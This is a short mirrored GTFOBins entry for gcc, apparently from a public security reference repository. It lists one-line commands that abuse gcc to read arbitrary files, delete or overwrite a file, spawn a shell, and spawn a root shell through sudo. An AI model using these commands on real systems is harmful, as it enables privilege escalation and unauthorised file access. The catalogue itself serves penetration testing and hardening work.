mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
16 lines
326 B
Markdown
16 lines
326 B
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
gcc -x c -E "$LFILE"
|
|
file-write: # XXX this should be file-delete
|
|
- code: |
|
|
LFILE=file_to_delete
|
|
gcc -xc /dev/null -o $LFILE
|
|
shell:
|
|
- code: gcc -wrapper /bin/sh,-s .
|
|
sudo:
|
|
- code: sudo gcc -wrapper /bin/sh,-s .
|
|
---
|